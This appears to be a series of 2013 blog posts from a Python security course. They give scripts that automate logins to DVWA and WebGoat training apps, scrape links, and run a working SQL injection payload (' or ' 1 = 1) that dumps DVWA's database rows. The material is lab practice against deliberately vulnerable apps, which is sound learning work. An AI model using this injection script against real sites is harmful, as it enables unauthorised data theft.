Sunday, February 24, 2013

SQLi with Python and DVWA: article 201304

Continuing on with my studies and practice of Python with the help of SecurityTube's SPSE course, I am presenting below a proof-of-concept script for SQL injection. The script is written in Python 2.7 and uses Mechanize along with BeautifulSoup. I ran the script against Damn Vulnerable Web Application (DVWA), found on the OWASP Broken Web Apps VM. I have commented the script to make it as self-explanatory as possible.
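Before the script itself, it helps to see why this payload works. The sketch below is an illustration only: the query template is an assumption modeled on DVWA's low-security SQLi source (the real column names may differ). MySQL casts the string ' 1 = 1' to the number 1 in a boolean context, so the OR clause is true for every row.

```python
# Hypothetical query template assumed to resemble DVWA's low-security source;
# user input is interpolated directly between single quotes.
template = "SELECT first_name, last_name FROM users WHERE user_id = '%s'"

normal = template % "1"
injected = template % "' or ' 1 = 1"

print(normal)
print(injected)
# The injected WHERE clause becomes: user_id = '' or ' 1 = 1'
# MySQL coerces the string ' 1 = 1' to 1 (true), so every row matches.
```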

Here is a screen shot of the output:



Here is the script:

#!/usr/bin/python

#Bringing in mechanize and Beautiful Soup. These are installed separately from Python
import mechanize
from bs4 import BeautifulSoup

#Building the SQL injection
hotSQLinjection = "' or ' 1 = 1"

#Creating a mechanize browser
browser = mechanize.Browser()

#Opening the URL of the DVWA web page; obviously your location will most likely vary
browser.open("http://192.168.1.152/dvwa")

#Printing the browser title to show where I am
print "#" *55
print "# " + browser.title()
print "#" *55 + "\n"

#There is only one form on this page so I jump right in
browser.select_form(nr=0)


#Below I am filling out the form fields and submitting for log in
browser.form['username'] = 'admin'
browser.form['password'] = 'admin'
browser.submit()

#Again printing the browser title to show where I am
print "#" *55
print "# " + browser.title()
print "#" *55

#Now that I am authenticated I am opening the browser to the SQL Injection page
browser.open("http://192.168.1.152/dvwa/vulnerabilities/sqli")

#Again there is only one form, so I will jump right in

#Printing out what the SQLi is
print "\n"
print "#" *55
print "# " + " The SQL Injection that will be used is: " + hotSQLinjection
print "# " + " Injecting now"
print "#" *55

#Inserting the SQL injection into the form field and submitting
browser.select_form(nr=0)
browser.form['id'] = hotSQLinjection
browser.submit()

#This feeds the browser page into a variable to feed into the BeautifulSoup parser
page1 =  browser.response().read()

#As it says!
print "\n"
print "#" *55
print "# " + " Feeding page into BeautifulSoup LXML Parser"
print "#" *55

soup1 = BeautifulSoup(page1, "lxml")

#The "sensitive" info from the injection is surrounded by <pre> tags
#This creates a list to iterate though
allPRE =  soup1.find_all('pre')

#Printing out the "sensitive" information from the DVWA database
print "\n"
print "#" *55
print "# " + " Dump of database"
print "#" *55

#Iterating through the list
for pre in allPRE:
    print pre

#All done
print "\n"
print "#" *55
print "# " + " Injection and dump complete"
print "#" *55
print "\n"
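The `pre` extraction at the end of the script can be illustrated without a live DVWA instance. In the sketch below, the sample HTML is invented for illustration (real DVWA output differs), and a bare regex stands in for BeautifulSoup's more robust find_all('pre'), which is the better choice against real pages.

```python
import re

# Stand-in for the HTML DVWA returns; each result row comes back in its
# own <pre> block. This markup is invented for the example.
page = ("<html><body>"
        "<pre>ID: 1<br>First name: admin<br>Surname: admin</pre>"
        "<pre>ID: 2<br>First name: Gordon<br>Surname: Brown</pre>"
        "</body></html>")

# BeautifulSoup's find_all('pre') does this robustly; a non-greedy regex
# is enough for simple, well-formed markup like the sample above.
allPRE = re.findall(r'<pre>(.*?)</pre>', page)

for pre in allPRE:
    print(pre)
```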

Saturday, February 23, 2013

Python Script to Log Into DVWA: article 201303

Very similar to my last post, this is just a simple script using Python with Mechanize to log into Damn Vulnerable Web App (DVWA) from the OWASP Broken Web Apps VM.

Here is the script:

#!/usr/bin/python

import mechanize

browser = mechanize.Browser()

browser.open("http://192.168.1.152/dvwa")
print "#" *50
print "# " + browser.title()
print "#" *50 + "\n"

# There is only one form on this page so I jump right in

browser.select_form(nr=0)

#below I am filling out the form fields and submitting
browser.form['username'] = 'admin'
browser.form['password'] = 'admin'
browser.submit()

print "#" *50
print "# " + browser.title()
print "#" *50

Here is a screen shot of the output. Notice I print the title of the "Log In" page, and once credentials are submitted I print the title of the "Welcome" page.
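For reference, when browser.submit() runs, mechanize serializes the form fields into a URL-encoded POST body. The sketch below builds that body with the standard library; the extra Login field is an assumption about DVWA's login form (mechanize picks up the real control names from the page automatically).

```python
# Python 3 import shown first; the except branch covers Python 2.
try:
    from urllib.parse import urlencode   # Python 3
except ImportError:
    from urllib import urlencode         # Python 2

# Field names 'username' and 'password' come from the script above;
# 'Login' is a hypothetical submit-button name.
fields = [('username', 'admin'), ('password', 'admin'), ('Login', 'Login')]
body = urlencode(fields)
print(body)
```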


Friday, February 15, 2013

Python Script to Connect to and Start Web Goat: article 201302

This is a simple script that uses Mechanize to connect to Web Goat, log in, and start Web Goat.

If you want to connect to Web Goat remotely you will need to modify the server_80.xml file (or server_8080.xml, based on your config) to allow remote connections. DOING THIS INCREASES RISK TO YOUR SYSTEM.
To modify the XML file, navigate to your Web Goat folder. In my case:
    P:\WebGoat-5.4-OWASP_Standard_Win32\WebGoat-5.4\tomcat\conf
Select the appropriate file for editing; in my case server_80.xml. Find the Connector element, whose address attribute binds Tomcat to 127.0.0.1 by default, and change it to an address reachable from your other systems (or remove the attribute entirely).
Start the Web Goat listener.
I ran the below script from one system to connect to the system where Web Goat was listening.

#!/usr/bin/python


import mechanize

browser = mechanize.Browser()

browser.add_password("http://192.168.1.14/WebGoat/attack", "guest", "guest")

browser.open('http://192.168.1.14/WebGoat/attack')

for form in browser.forms():
    print "form is: ", form

browser.select_form(nr=0)

browser.submit()

for link in browser.links():
    print link.text + ' : ' + link.url

Of course, the IP address of your Web Goat instance will most likely vary. What is going on above is:
1. I imported mechanize (this needs to be installed onto your system)
2. I created a browser instance
3. I added Web Goat's default username and password ('guest' / 'guest') to the browser instance
4. I opened a session with the Web Goat listener
5. I print the available forms (there really is no need to do this)
6. I select the form (there is only one on this page)
7. I submit the form
8. I print the links' text and URLs just to verify that I have successfully logged in and started Web Goat
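Step 3 deserves a note: Web Goat uses HTTP Basic authentication, and add_password() tells mechanize to answer the server's challenge. What ultimately goes over the wire is an Authorization header carrying the base64 of "user:password", which can be sketched with the standard library:

```python
import base64

# The header mechanize sends on our behalf for the guest/guest account:
# base64 of "guest:guest" prefixed with the Basic scheme.
credentials = base64.b64encode(b"guest:guest").decode("ascii")
header = "Authorization: Basic " + credentials
print(header)
```

Note that base64 is an encoding, not encryption, which is one more reason not to expose a Web Goat listener beyond a lab network.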

Next steps for me are to practice attacking Web Goat with Mechanize.

Sunday, February 10, 2013

Link Scraper using Python: article 201301


As part of the SecurityTube Python Scripting Expert course, the below is a simple script written to extract the absolute links from a provided web page.

Written in Python 2.7.2 using urllib, re, and Beautiful Soup 4 with the lxml parser.

Here is a screen shot of an example:




And here is the code:

#!/usr/bin/python

import re
import urllib
from bs4 import BeautifulSoup

print "#" * 50
print "#    Enter a url in the format http://site.domain"
print "#    e.g. http://whyjoseph.com"
url = raw_input("#    Enter a URL: ")
print "#" *50
print "\n"
print ">>>>  Retrieving and parsing the page. This could take several seconds. <<<<"
print "\n"
htmlPage = urllib.urlopen(url)

soup = BeautifulSoup(htmlPage, 'lxml')

allLinks = soup.find_all('a')

for i in allLinks:
    link = i.get('href')
    if link:
        matchobj = re.search('http', link, re.I)
        if matchobj:
            print link

print "\n"
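One caveat about the filter above: re.search('http', link, re.I) keeps any href that contains "http" anywhere, so a relative link such as /docs/http-notes.html would slip through. A stricter check is to parse the URL and look at its scheme; the sample links below are invented for illustration.

```python
# Python 3 import shown first; the except branch covers Python 2.
try:
    from urllib.parse import urlparse   # Python 3
except ImportError:
    from urlparse import urlparse       # Python 2

# Hypothetical hrefs a page might contain.
links = ['http://whyjoseph.com/about', '/relative/path',
         'HTTPS://example.com', 'mailto:someone@example.com']

# urlparse lowercases the scheme, so case-insensitive matching is free.
absolute = [l for l in links if urlparse(l).scheme in ('http', 'https')]
print(absolute)
```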

